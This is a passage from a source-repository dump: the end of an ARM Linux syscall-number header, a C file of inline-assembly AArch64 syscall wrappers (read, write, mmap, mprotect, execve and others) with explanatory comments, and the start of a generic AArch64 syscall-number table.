__NR_vfork (__NR_SYSCALL_BASE+190) 219 | #define __NR_ugetrlimit 
(__NR_SYSCALL_BASE+191) /* SuS compliant getrlimit */ 220 | #define __NR_mmap2 (__NR_SYSCALL_BASE+192) 221 | #define __NR_truncate64 (__NR_SYSCALL_BASE+193) 222 | #define __NR_ftruncate64 (__NR_SYSCALL_BASE+194) 223 | #define __NR_stat64 (__NR_SYSCALL_BASE+195) 224 | #define __NR_lstat64 (__NR_SYSCALL_BASE+196) 225 | #define __NR_fstat64 (__NR_SYSCALL_BASE+197) 226 | #define __NR_lchown32 (__NR_SYSCALL_BASE+198) 227 | #define __NR_getuid32 (__NR_SYSCALL_BASE+199) 228 | #define __NR_getgid32 (__NR_SYSCALL_BASE+200) 229 | #define __NR_geteuid32 (__NR_SYSCALL_BASE+201) 230 | #define __NR_getegid32 (__NR_SYSCALL_BASE+202) 231 | #define __NR_setreuid32 (__NR_SYSCALL_BASE+203) 232 | #define __NR_setregid32 (__NR_SYSCALL_BASE+204) 233 | #define __NR_getgroups32 (__NR_SYSCALL_BASE+205) 234 | #define __NR_setgroups32 (__NR_SYSCALL_BASE+206) 235 | #define __NR_fchown32 (__NR_SYSCALL_BASE+207) 236 | #define __NR_setresuid32 (__NR_SYSCALL_BASE+208) 237 | #define __NR_getresuid32 (__NR_SYSCALL_BASE+209) 238 | #define __NR_setresgid32 (__NR_SYSCALL_BASE+210) 239 | #define __NR_getresgid32 (__NR_SYSCALL_BASE+211) 240 | #define __NR_chown32 (__NR_SYSCALL_BASE+212) 241 | #define __NR_setuid32 (__NR_SYSCALL_BASE+213) 242 | #define __NR_setgid32 (__NR_SYSCALL_BASE+214) 243 | #define __NR_setfsuid32 (__NR_SYSCALL_BASE+215) 244 | #define __NR_setfsgid32 (__NR_SYSCALL_BASE+216) 245 | #define __NR_getdents64 (__NR_SYSCALL_BASE+217) 246 | #define __NR_pivot_root (__NR_SYSCALL_BASE+218) 247 | #define __NR_mincore (__NR_SYSCALL_BASE+219) 248 | #define __NR_madvise (__NR_SYSCALL_BASE+220) 249 | #define __NR_fcntl64 (__NR_SYSCALL_BASE+221) 250 | /* 222 for tux */ 251 | /* 223 is unused */ 252 | #define __NR_gettid (__NR_SYSCALL_BASE+224) 253 | #define __NR_readahead (__NR_SYSCALL_BASE+225) 254 | #define __NR_setxattr (__NR_SYSCALL_BASE+226) 255 | #define __NR_lsetxattr (__NR_SYSCALL_BASE+227) 256 | #define __NR_fsetxattr (__NR_SYSCALL_BASE+228) 257 | #define __NR_getxattr 
(__NR_SYSCALL_BASE+229) 258 | #define __NR_lgetxattr (__NR_SYSCALL_BASE+230) 259 | #define __NR_fgetxattr (__NR_SYSCALL_BASE+231) 260 | #define __NR_listxattr (__NR_SYSCALL_BASE+232) 261 | #define __NR_llistxattr (__NR_SYSCALL_BASE+233) 262 | #define __NR_flistxattr (__NR_SYSCALL_BASE+234) 263 | #define __NR_removexattr (__NR_SYSCALL_BASE+235) 264 | #define __NR_lremovexattr (__NR_SYSCALL_BASE+236) 265 | #define __NR_fremovexattr (__NR_SYSCALL_BASE+237) 266 | #define __NR_tkill (__NR_SYSCALL_BASE+238) 267 | #define __NR_sendfile64 (__NR_SYSCALL_BASE+239) 268 | #define __NR_futex (__NR_SYSCALL_BASE+240) 269 | #define __NR_sched_setaffinity (__NR_SYSCALL_BASE+241) 270 | #define __NR_sched_getaffinity (__NR_SYSCALL_BASE+242) 271 | #define __NR_io_setup (__NR_SYSCALL_BASE+243) 272 | #define __NR_io_destroy (__NR_SYSCALL_BASE+244) 273 | #define __NR_io_getevents (__NR_SYSCALL_BASE+245) 274 | #define __NR_io_submit (__NR_SYSCALL_BASE+246) 275 | #define __NR_io_cancel (__NR_SYSCALL_BASE+247) 276 | #define __NR_exit_group (__NR_SYSCALL_BASE+248) 277 | #define __NR_lookup_dcookie (__NR_SYSCALL_BASE+249) 278 | #define __NR_epoll_create (__NR_SYSCALL_BASE+250) 279 | #define __NR_epoll_ctl (__NR_SYSCALL_BASE+251) 280 | #define __NR_epoll_wait (__NR_SYSCALL_BASE+252) 281 | #define __NR_remap_file_pages (__NR_SYSCALL_BASE+253) 282 | /* 254 for set_thread_area */ 283 | /* 255 for get_thread_area */ 284 | #define __NR_set_tid_address (__NR_SYSCALL_BASE+256) 285 | #define __NR_timer_create (__NR_SYSCALL_BASE+257) 286 | #define __NR_timer_settime (__NR_SYSCALL_BASE+258) 287 | #define __NR_timer_gettime (__NR_SYSCALL_BASE+259) 288 | #define __NR_timer_getoverrun (__NR_SYSCALL_BASE+260) 289 | #define __NR_timer_delete (__NR_SYSCALL_BASE+261) 290 | #define __NR_clock_settime (__NR_SYSCALL_BASE+262) 291 | #define __NR_clock_gettime (__NR_SYSCALL_BASE+263) 292 | #define __NR_clock_getres (__NR_SYSCALL_BASE+264) 293 | #define __NR_clock_nanosleep (__NR_SYSCALL_BASE+265) 294 | #define 
__NR_statfs64 (__NR_SYSCALL_BASE+266) 295 | #define __NR_fstatfs64 (__NR_SYSCALL_BASE+267) 296 | #define __NR_tgkill (__NR_SYSCALL_BASE+268) 297 | #define __NR_utimes (__NR_SYSCALL_BASE+269) 298 | #define __NR_arm_fadvise64_64 (__NR_SYSCALL_BASE+270) 299 | #define __NR_pciconfig_iobase (__NR_SYSCALL_BASE+271) 300 | #define __NR_pciconfig_read (__NR_SYSCALL_BASE+272) 301 | #define __NR_pciconfig_write (__NR_SYSCALL_BASE+273) 302 | #define __NR_mq_open (__NR_SYSCALL_BASE+274) 303 | #define __NR_mq_unlink (__NR_SYSCALL_BASE+275) 304 | #define __NR_mq_timedsend (__NR_SYSCALL_BASE+276) 305 | #define __NR_mq_timedreceive (__NR_SYSCALL_BASE+277) 306 | #define __NR_mq_notify (__NR_SYSCALL_BASE+278) 307 | #define __NR_mq_getsetattr (__NR_SYSCALL_BASE+279) 308 | #define __NR_waitid (__NR_SYSCALL_BASE+280) 309 | #define __NR_socket (__NR_SYSCALL_BASE+281) 310 | #define __NR_bind (__NR_SYSCALL_BASE+282) 311 | #define __NR_connect (__NR_SYSCALL_BASE+283) 312 | #define __NR_listen (__NR_SYSCALL_BASE+284) 313 | #define __NR_accept (__NR_SYSCALL_BASE+285) 314 | #define __NR_getsockname (__NR_SYSCALL_BASE+286) 315 | #define __NR_getpeername (__NR_SYSCALL_BASE+287) 316 | #define __NR_socketpair (__NR_SYSCALL_BASE+288) 317 | #define __NR_send (__NR_SYSCALL_BASE+289) 318 | #define __NR_sendto (__NR_SYSCALL_BASE+290) 319 | #define __NR_recv (__NR_SYSCALL_BASE+291) 320 | #define __NR_recvfrom (__NR_SYSCALL_BASE+292) 321 | #define __NR_shutdown (__NR_SYSCALL_BASE+293) 322 | #define __NR_setsockopt (__NR_SYSCALL_BASE+294) 323 | #define __NR_getsockopt (__NR_SYSCALL_BASE+295) 324 | #define __NR_sendmsg (__NR_SYSCALL_BASE+296) 325 | #define __NR_recvmsg (__NR_SYSCALL_BASE+297) 326 | #define __NR_semop (__NR_SYSCALL_BASE+298) 327 | #define __NR_semget (__NR_SYSCALL_BASE+299) 328 | #define __NR_semctl (__NR_SYSCALL_BASE+300) 329 | #define __NR_msgsnd (__NR_SYSCALL_BASE+301) 330 | #define __NR_msgrcv (__NR_SYSCALL_BASE+302) 331 | #define __NR_msgget (__NR_SYSCALL_BASE+303) 332 | #define 
__NR_msgctl (__NR_SYSCALL_BASE+304) 333 | #define __NR_shmat (__NR_SYSCALL_BASE+305) 334 | #define __NR_shmdt (__NR_SYSCALL_BASE+306) 335 | #define __NR_shmget (__NR_SYSCALL_BASE+307) 336 | #define __NR_shmctl (__NR_SYSCALL_BASE+308) 337 | #define __NR_add_key (__NR_SYSCALL_BASE+309) 338 | #define __NR_request_key (__NR_SYSCALL_BASE+310) 339 | #define __NR_keyctl (__NR_SYSCALL_BASE+311) 340 | #define __NR_semtimedop (__NR_SYSCALL_BASE+312) 341 | #define __NR_vserver (__NR_SYSCALL_BASE+313) 342 | #define __NR_ioprio_set (__NR_SYSCALL_BASE+314) 343 | #define __NR_ioprio_get (__NR_SYSCALL_BASE+315) 344 | #define __NR_inotify_init (__NR_SYSCALL_BASE+316) 345 | #define __NR_inotify_add_watch (__NR_SYSCALL_BASE+317) 346 | #define __NR_inotify_rm_watch (__NR_SYSCALL_BASE+318) 347 | #define __NR_mbind (__NR_SYSCALL_BASE+319) 348 | #define __NR_get_mempolicy (__NR_SYSCALL_BASE+320) 349 | #define __NR_set_mempolicy (__NR_SYSCALL_BASE+321) 350 | #define __NR_openat (__NR_SYSCALL_BASE+322) 351 | #define __NR_mkdirat (__NR_SYSCALL_BASE+323) 352 | #define __NR_mknodat (__NR_SYSCALL_BASE+324) 353 | #define __NR_fchownat (__NR_SYSCALL_BASE+325) 354 | #define __NR_futimesat (__NR_SYSCALL_BASE+326) 355 | #define __NR_fstatat64 (__NR_SYSCALL_BASE+327) 356 | #define __NR_unlinkat (__NR_SYSCALL_BASE+328) 357 | #define __NR_renameat (__NR_SYSCALL_BASE+329) 358 | #define __NR_linkat (__NR_SYSCALL_BASE+330) 359 | #define __NR_symlinkat (__NR_SYSCALL_BASE+331) 360 | #define __NR_readlinkat (__NR_SYSCALL_BASE+332) 361 | #define __NR_fchmodat (__NR_SYSCALL_BASE+333) 362 | #define __NR_faccessat (__NR_SYSCALL_BASE+334) 363 | #define __NR_pselect6 (__NR_SYSCALL_BASE+335) 364 | #define __NR_ppoll (__NR_SYSCALL_BASE+336) 365 | #define __NR_unshare (__NR_SYSCALL_BASE+337) 366 | #define __NR_set_robust_list (__NR_SYSCALL_BASE+338) 367 | #define __NR_get_robust_list (__NR_SYSCALL_BASE+339) 368 | #define __NR_splice (__NR_SYSCALL_BASE+340) 369 | #define __NR_arm_sync_file_range 
(__NR_SYSCALL_BASE+341) 370 | #define __NR_sync_file_range2 __NR_arm_sync_file_range 371 | #define __NR_tee (__NR_SYSCALL_BASE+342) 372 | #define __NR_vmsplice (__NR_SYSCALL_BASE+343) 373 | #define __NR_move_pages (__NR_SYSCALL_BASE+344) 374 | #define __NR_getcpu (__NR_SYSCALL_BASE+345) 375 | #define __NR_epoll_pwait (__NR_SYSCALL_BASE+346) 376 | #define __NR_kexec_load (__NR_SYSCALL_BASE+347) 377 | #define __NR_utimensat (__NR_SYSCALL_BASE+348) 378 | #define __NR_signalfd (__NR_SYSCALL_BASE+349) 379 | #define __NR_timerfd_create (__NR_SYSCALL_BASE+350) 380 | #define __NR_eventfd (__NR_SYSCALL_BASE+351) 381 | #define __NR_fallocate (__NR_SYSCALL_BASE+352) 382 | #define __NR_timerfd_settime (__NR_SYSCALL_BASE+353) 383 | #define __NR_timerfd_gettime (__NR_SYSCALL_BASE+354) 384 | #define __NR_signalfd4 (__NR_SYSCALL_BASE+355) 385 | #define __NR_eventfd2 (__NR_SYSCALL_BASE+356) 386 | #define __NR_epoll_create1 (__NR_SYSCALL_BASE+357) 387 | #define __NR_dup3 (__NR_SYSCALL_BASE+358) 388 | #define __NR_pipe2 (__NR_SYSCALL_BASE+359) 389 | #define __NR_inotify_init1 (__NR_SYSCALL_BASE+360) 390 | #define __NR_preadv (__NR_SYSCALL_BASE+361) 391 | #define __NR_pwritev (__NR_SYSCALL_BASE+362) 392 | #define __NR_rt_tgsigqueueinfo (__NR_SYSCALL_BASE+363) 393 | #define __NR_perf_event_open (__NR_SYSCALL_BASE+364) 394 | #define __NR_recvmmsg (__NR_SYSCALL_BASE+365) 395 | #define __NR_accept4 (__NR_SYSCALL_BASE+366) 396 | #define __NR_fanotify_init (__NR_SYSCALL_BASE+367) 397 | #define __NR_fanotify_mark (__NR_SYSCALL_BASE+368) 398 | #define __NR_prlimit64 (__NR_SYSCALL_BASE+369) 399 | #define __NR_name_to_handle_at (__NR_SYSCALL_BASE+370) 400 | #define __NR_open_by_handle_at (__NR_SYSCALL_BASE+371) 401 | #define __NR_clock_adjtime (__NR_SYSCALL_BASE+372) 402 | #define __NR_syncfs (__NR_SYSCALL_BASE+373) 403 | #define __NR_sendmmsg (__NR_SYSCALL_BASE+374) 404 | #define __NR_setns (__NR_SYSCALL_BASE+375) 405 | #define __NR_process_vm_readv (__NR_SYSCALL_BASE+376) 406 | #define 
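__NR_process_vm_writev (__NR_SYSCALL_BASE+377)
#define __NR_kcmp           (__NR_SYSCALL_BASE+378)
#define __NR_finit_module   (__NR_SYSCALL_BASE+379)
#define __NR_sched_setattr  (__NR_SYSCALL_BASE+380)
#define __NR_sched_getattr  (__NR_SYSCALL_BASE+381)
#define __NR_renameat2      (__NR_SYSCALL_BASE+382)
#define __NR_memfd_create   (__NR_SYSCALL_BASE+385)

/*
 * The following SWIs are ARM private.
 */
#define __ARM_NR_BASE       (__NR_SYSCALL_BASE+0x0f0000)
#define __ARM_NR_breakpoint (__ARM_NR_BASE+1)
#define __ARM_NR_cacheflush (__ARM_NR_BASE+2)
#define __ARM_NR_usr26      (__ARM_NR_BASE+3)
#define __ARM_NR_usr32      (__ARM_NR_BASE+4)
#define __ARM_NR_set_tls    (__ARM_NR_BASE+5)

/*
 * The following syscalls are obsolete and no longer available for EABI.
 */
#if defined(__ARM_EABI__)
#undef __NR_time
#undef __NR_umount
#undef __NR_stime
#undef __NR_alarm
#undef __NR_utime
#undef __NR_getrlimit
#undef __NR_select
#undef __NR_readdir
#undef __NR_mmap
#undef __NR_socketcall
#undef __NR_syscall
#undef __NR_ipc
#endif

#endif /* _SYMB__ASM_ARM_UNISTD_H */

--------------------------------------------------------------------------------
/stage2/syscall_arm_64.c:
--------------------------------------------------------------------------------
#include "syscall_arm_64.h"
#include "linuxdefs.h"

/*
 * Raw Linux system call wrappers for AArch64: arguments go in x0-x5, the
 * call number in x8, and "svc #0" traps into the kernel, which leaves
 * the result in x0.  Every wrapper returns that raw value, so a failure
 * shows up as a negative errno, not as -1 with errno set.
 *
 * Each asm statement declares a "memory" clobber: the kernel reads or
 * writes memory the compiler cannot see (buf, path, argv...), so without
 * it the compiler may keep a buffer's contents in registers across the
 * trap or sink the stores that fill it below the call.
 */

/* read(2): read up to `size` bytes from `fd` into `buf`. */
ssize_t _read(int fd, void *buf, size_t size)
{
    ssize_t ret;
    register long x0 asm ("x0") = (long)fd;
    register long x1 asm ("x1") = (long)buf;
    register long x2 asm ("x2") = (long)size;
    register long x8 asm ("x8") = __NR_read;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}

/* write(2): write up to `size` bytes from `buf` to `fd`. */
ssize_t _write(int fd, const void *buf, size_t size)
{
    ssize_t ret;
    register long x0 asm ("x0") = (long)fd;
    register long x1 asm ("x1") = (long)buf;
    register long x2 asm ("x2") = (long)size;
    register long x8 asm ("x8") = __NR_write;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}

/*
 * open(2).  The kernel takes (path, flags, mode) in x0-x2, so the
 * second argument here is used as the open flags and the third as the
 * file mode, whatever the parameter names suggest.
 * NOTE(review): the generic AArch64 syscall table that syscall_arm_64.h
 * is based on provides openat but no plain open; confirm __NR_open
 * resolves to a number the target kernel accepts, or use openat with
 * AT_FDCWD instead.
 */
int _open(char * path, int mode, int flags)
{
    long ret;
    register long x0 asm ("x0") = (long)path;
    register long x1 asm ("x1") = (long)mode;
    register long x2 asm ("x2") = (long)flags;
    register long x8 asm ("x8") = __NR_open;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}

/* close(2). */
int _close(int fd)
{
    long ret;
    register long x0 asm ("x0") = (long)fd;
    register long x8 asm ("x8") = __NR_close;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0)
        : "memory"
    );
    return ret;
}

/* lseek(2): reposition `fd` by `offset` relative to `whence`; returns the new offset. */
long _lseek(int fd, long offset, int whence)
{
    long ret;
    register long x0 asm ("x0") = (long)fd;
    register long x1 asm ("x1") = (long)offset;
    register long x2 asm ("x2") = (long)whence;
    register long x8 asm ("x8") = __NR_lseek;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}

/*
 * mmap(2): `offset` is a byte offset here, unlike the 32-bit ARM build,
 * which goes through mmap2 and takes it in 4096-byte units — C code
 * shared across arches should pass 0 or convert.  Returns the raw
 * kernel value: on failure a negative errno encoded as a pointer.
 */
void * _mmap(void * start, long length, int prot, int flags, int fd, long offset)
{
    void * ret;
    register long x0 asm ("x0") = (long)start;
    register long x1 asm ("x1") = (long)length;
    register long x2 asm ("x2") = (long)prot;
    register long x3 asm ("x3") = (long)flags;
    register long x4 asm ("x4") = (long)fd;
    register long x5 asm ("x5") = (long)offset;
    register long x8 asm ("x8") = __NR_mmap;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
        : "memory"
    );
    return ret;
}

/* mprotect(2): change the protection of the pages covering [addr, addr+len). */
long _mprotect(void * addr, long len, int prot)
{
    long ret;
    register long x0 asm ("x0") = (long)addr;
    register long x1 asm ("x1") = (long)len;
    register long x2 asm ("x2") = (long)prot;
    register long x8 asm ("x8") = __NR_mprotect;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}

/* munmap(2). */
long _munmap(char * start, int length)
{
    long ret;
    register long x0 asm ("x0") = (long)start;
    register long x1 asm ("x1") = (long)length;
    register long x8 asm ("x8") = __NR_munmap;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1)
        : "memory"
    );
    return ret;
}

/* brk(2): returns the kernel's (possibly unchanged) program break. */
long _brk(unsigned long addr)
{
    long ret;
    register long x0 asm ("x0") = (long)addr;
    register long x8 asm ("x8") = __NR_brk;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0)
        : "memory"
    );
    return ret;
}

/* exit(2) with status `level`; the return statement is never reached. */
int _exit(int level)
{
    long ret;
    register long x0 asm ("x0") = (long)level;
    register long x8 asm ("x8") = __NR_exit;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0)
        : "memory"
    );
    return ret;
}

/*
 * Terminates the process with status -1.
 * NOTE(review): presumably here so that compiler runtime helpers have a
 * raise() symbol to link against in this freestanding build — confirm.
 */
void raise(void)
{
    _exit(-1);
}

/* execve(2): replaces the current image; only returns on failure. */
long _execve(char * filename, char ** argv, char ** envp)
{
    long ret;
    register long x0 asm ("x0") = (long)filename;
    register long x1 asm ("x1") = (long)argv;
    register long x2 asm ("x2") = (long)envp;
    register long x8 asm ("x8") = __NR_execve;

    asm volatile
    (
        "svc #0; mov %0, x0"
        : "=r" (ret)
        : "r"(x8), "r"(x0), "r"(x1), "r"(x2)
        : "memory"
    );
    return ret;
}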
-------------------------------------------------------------------------------- /stage2/syscall_arm_64.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | /* 4 | * This file contains the system call numbers, based on the 5 | * layout of the x86-64 architecture, which embeds the 6 | * pointer to the syscall in the table. 7 | * 8 | * As a basic principle, no duplication of functionality 9 | * should be added, e.g. we don't use lseek when llseek 10 | * is present. New architectures should use this file 11 | * and implement the less feature-full calls in user space. 12 | */ 13 | 14 | #ifndef __SYSCALL 15 | #define __SYSCALL(x, y) 16 | #endif 17 | 18 | #if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT) 19 | #define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32) 20 | #else 21 | #define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _64) 22 | #endif 23 | 24 | #ifdef __SYSCALL_COMPAT 25 | #define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _comp) 26 | #define __SC_COMP_3264(_nr, _32, _64, _comp) __SYSCALL(_nr, _comp) 27 | #else 28 | #define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _sys) 29 | #define __SC_COMP_3264(_nr, _32, _64, _comp) __SC_3264(_nr, _32, _64) 30 | #endif 31 | 32 | #define __NR_io_setup 0 33 | __SC_COMP(__NR_io_setup, sys_io_setup, compat_sys_io_setup) 34 | #define __NR_io_destroy 1 35 | __SYSCALL(__NR_io_destroy, sys_io_destroy) 36 | #define __NR_io_submit 2 37 | __SC_COMP(__NR_io_submit, sys_io_submit, compat_sys_io_submit) 38 | #define __NR_io_cancel 3 39 | __SYSCALL(__NR_io_cancel, sys_io_cancel) 40 | #define __NR_io_getevents 4 41 | __SC_COMP(__NR_io_getevents, sys_io_getevents, compat_sys_io_getevents) 42 | 43 | /* fs/xattr.c */ 44 | #define __NR_setxattr 5 45 | __SYSCALL(__NR_setxattr, sys_setxattr) 46 | #define __NR_lsetxattr 6 47 | __SYSCALL(__NR_lsetxattr, sys_lsetxattr) 48 | #define __NR_fsetxattr 7 49 | __SYSCALL(__NR_fsetxattr, sys_fsetxattr) 50 | #define __NR_getxattr 8 51 | 
__SYSCALL(__NR_getxattr, sys_getxattr) 52 | #define __NR_lgetxattr 9 53 | __SYSCALL(__NR_lgetxattr, sys_lgetxattr) 54 | #define __NR_fgetxattr 10 55 | __SYSCALL(__NR_fgetxattr, sys_fgetxattr) 56 | #define __NR_listxattr 11 57 | __SYSCALL(__NR_listxattr, sys_listxattr) 58 | #define __NR_llistxattr 12 59 | __SYSCALL(__NR_llistxattr, sys_llistxattr) 60 | #define __NR_flistxattr 13 61 | __SYSCALL(__NR_flistxattr, sys_flistxattr) 62 | #define __NR_removexattr 14 63 | __SYSCALL(__NR_removexattr, sys_removexattr) 64 | #define __NR_lremovexattr 15 65 | __SYSCALL(__NR_lremovexattr, sys_lremovexattr) 66 | #define __NR_fremovexattr 16 67 | __SYSCALL(__NR_fremovexattr, sys_fremovexattr) 68 | 69 | /* fs/dcache.c */ 70 | #define __NR_getcwd 17 71 | __SYSCALL(__NR_getcwd, sys_getcwd) 72 | 73 | /* fs/cookies.c */ 74 | #define __NR_lookup_dcookie 18 75 | __SC_COMP(__NR_lookup_dcookie, sys_lookup_dcookie, compat_sys_lookup_dcookie) 76 | 77 | /* fs/eventfd.c */ 78 | #define __NR_eventfd2 19 79 | __SYSCALL(__NR_eventfd2, sys_eventfd2) 80 | 81 | /* fs/eventpoll.c */ 82 | #define __NR_epoll_create1 20 83 | __SYSCALL(__NR_epoll_create1, sys_epoll_create1) 84 | #define __NR_epoll_ctl 21 85 | __SYSCALL(__NR_epoll_ctl, sys_epoll_ctl) 86 | #define __NR_epoll_pwait 22 87 | __SC_COMP(__NR_epoll_pwait, sys_epoll_pwait, compat_sys_epoll_pwait) 88 | 89 | /* fs/fcntl.c */ 90 | #define __NR_dup 23 91 | __SYSCALL(__NR_dup, sys_dup) 92 | #define __NR_dup3 24 93 | __SYSCALL(__NR_dup3, sys_dup3) 94 | #define __NR3264_fcntl 25 95 | __SC_COMP_3264(__NR3264_fcntl, sys_fcntl64, sys_fcntl, compat_sys_fcntl64) 96 | 97 | /* fs/inotify_user.c */ 98 | #define __NR_inotify_init1 26 99 | __SYSCALL(__NR_inotify_init1, sys_inotify_init1) 100 | #define __NR_inotify_add_watch 27 101 | __SYSCALL(__NR_inotify_add_watch, sys_inotify_add_watch) 102 | #define __NR_inotify_rm_watch 28 103 | __SYSCALL(__NR_inotify_rm_watch, sys_inotify_rm_watch) 104 | 105 | /* fs/ioctl.c */ 106 | #define __NR_ioctl 29 107 | 
__SC_COMP(__NR_ioctl, sys_ioctl, compat_sys_ioctl) 108 | 109 | /* fs/ioprio.c */ 110 | #define __NR_ioprio_set 30 111 | __SYSCALL(__NR_ioprio_set, sys_ioprio_set) 112 | #define __NR_ioprio_get 31 113 | __SYSCALL(__NR_ioprio_get, sys_ioprio_get) 114 | 115 | /* fs/locks.c */ 116 | #define __NR_flock 32 117 | __SYSCALL(__NR_flock, sys_flock) 118 | 119 | /* fs/namei.c */ 120 | #define __NR_mknodat 33 121 | __SYSCALL(__NR_mknodat, sys_mknodat) 122 | #define __NR_mkdirat 34 123 | __SYSCALL(__NR_mkdirat, sys_mkdirat) 124 | #define __NR_unlinkat 35 125 | __SYSCALL(__NR_unlinkat, sys_unlinkat) 126 | #define __NR_symlinkat 36 127 | __SYSCALL(__NR_symlinkat, sys_symlinkat) 128 | #define __NR_linkat 37 129 | __SYSCALL(__NR_linkat, sys_linkat) 130 | #define __NR_renameat 38 131 | __SYSCALL(__NR_renameat, sys_renameat) 132 | 133 | /* fs/namespace.c */ 134 | #define __NR_umount2 39 135 | __SYSCALL(__NR_umount2, sys_umount) 136 | #define __NR_mount 40 137 | __SC_COMP(__NR_mount, sys_mount, compat_sys_mount) 138 | #define __NR_pivot_root 41 139 | __SYSCALL(__NR_pivot_root, sys_pivot_root) 140 | 141 | /* fs/nfsctl.c */ 142 | #define __NR_nfsservctl 42 143 | __SYSCALL(__NR_nfsservctl, sys_ni_syscall) 144 | 145 | /* fs/open.c */ 146 | #define __NR3264_statfs 43 147 | __SC_COMP_3264(__NR3264_statfs, sys_statfs64, sys_statfs, \ 148 | compat_sys_statfs64) 149 | #define __NR3264_fstatfs 44 150 | __SC_COMP_3264(__NR3264_fstatfs, sys_fstatfs64, sys_fstatfs, \ 151 | compat_sys_fstatfs64) 152 | #define __NR3264_truncate 45 153 | __SC_COMP_3264(__NR3264_truncate, sys_truncate64, sys_truncate, \ 154 | compat_sys_truncate64) 155 | #define __NR3264_ftruncate 46 156 | __SC_COMP_3264(__NR3264_ftruncate, sys_ftruncate64, sys_ftruncate, \ 157 | compat_sys_ftruncate64) 158 | 159 | #define __NR_fallocate 47 160 | __SC_COMP(__NR_fallocate, sys_fallocate, compat_sys_fallocate) 161 | #define __NR_faccessat 48 162 | __SYSCALL(__NR_faccessat, sys_faccessat) 163 | #define __NR_chdir 49 164 | 
__SYSCALL(__NR_chdir, sys_chdir) 165 | #define __NR_fchdir 50 166 | __SYSCALL(__NR_fchdir, sys_fchdir) 167 | #define __NR_chroot 51 168 | __SYSCALL(__NR_chroot, sys_chroot) 169 | #define __NR_fchmod 52 170 | __SYSCALL(__NR_fchmod, sys_fchmod) 171 | #define __NR_fchmodat 53 172 | __SYSCALL(__NR_fchmodat, sys_fchmodat) 173 | #define __NR_fchownat 54 174 | __SYSCALL(__NR_fchownat, sys_fchownat) 175 | #define __NR_fchown 55 176 | __SYSCALL(__NR_fchown, sys_fchown) 177 | #define __NR_openat 56 178 | __SC_COMP(__NR_openat, sys_openat, compat_sys_openat) 179 | #define __NR_close 57 180 | __SYSCALL(__NR_close, sys_close) 181 | #define __NR_vhangup 58 182 | __SYSCALL(__NR_vhangup, sys_vhangup) 183 | 184 | /* fs/pipe.c */ 185 | #define __NR_pipe2 59 186 | __SYSCALL(__NR_pipe2, sys_pipe2) 187 | 188 | /* fs/quota.c */ 189 | #define __NR_quotactl 60 190 | __SYSCALL(__NR_quotactl, sys_quotactl) 191 | 192 | /* fs/readdir.c */ 193 | #define __NR_getdents64 61 194 | #define __ARCH_WANT_COMPAT_SYS_GETDENTS64 195 | __SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64) 196 | 197 | /* fs/read_write.c */ 198 | #define __NR3264_lseek 62 199 | __SC_3264(__NR3264_lseek, sys_llseek, sys_lseek) 200 | #define __NR_read 63 201 | __SYSCALL(__NR_read, sys_read) 202 | #define __NR_write 64 203 | __SYSCALL(__NR_write, sys_write) 204 | #define __NR_readv 65 205 | __SC_COMP(__NR_readv, sys_readv, compat_sys_readv) 206 | #define __NR_writev 66 207 | __SC_COMP(__NR_writev, sys_writev, compat_sys_writev) 208 | #define __NR_pread64 67 209 | __SC_COMP(__NR_pread64, sys_pread64, compat_sys_pread64) 210 | #define __NR_pwrite64 68 211 | __SC_COMP(__NR_pwrite64, sys_pwrite64, compat_sys_pwrite64) 212 | #define __NR_preadv 69 213 | __SC_COMP(__NR_preadv, sys_preadv, compat_sys_preadv) 214 | #define __NR_pwritev 70 215 | __SC_COMP(__NR_pwritev, sys_pwritev, compat_sys_pwritev) 216 | 217 | /* fs/sendfile.c */ 218 | #define __NR3264_sendfile 71 219 | __SYSCALL(__NR3264_sendfile, sys_sendfile64) 220 | 
221 | /* fs/select.c */ 222 | #define __NR_pselect6 72 223 | __SC_COMP(__NR_pselect6, sys_pselect6, compat_sys_pselect6) 224 | #define __NR_ppoll 73 225 | __SC_COMP(__NR_ppoll, sys_ppoll, compat_sys_ppoll) 226 | 227 | /* fs/signalfd.c */ 228 | #define __NR_signalfd4 74 229 | __SC_COMP(__NR_signalfd4, sys_signalfd4, compat_sys_signalfd4) 230 | 231 | /* fs/splice.c */ 232 | #define __NR_vmsplice 75 233 | __SC_COMP(__NR_vmsplice, sys_vmsplice, compat_sys_vmsplice) 234 | #define __NR_splice 76 235 | __SYSCALL(__NR_splice, sys_splice) 236 | #define __NR_tee 77 237 | __SYSCALL(__NR_tee, sys_tee) 238 | 239 | /* fs/stat.c */ 240 | #define __NR_readlinkat 78 241 | __SYSCALL(__NR_readlinkat, sys_readlinkat) 242 | #define __NR3264_fstatat 79 243 | __SC_3264(__NR3264_fstatat, sys_fstatat64, sys_newfstatat) 244 | #define __NR3264_fstat 80 245 | __SC_3264(__NR3264_fstat, sys_fstat64, sys_newfstat) 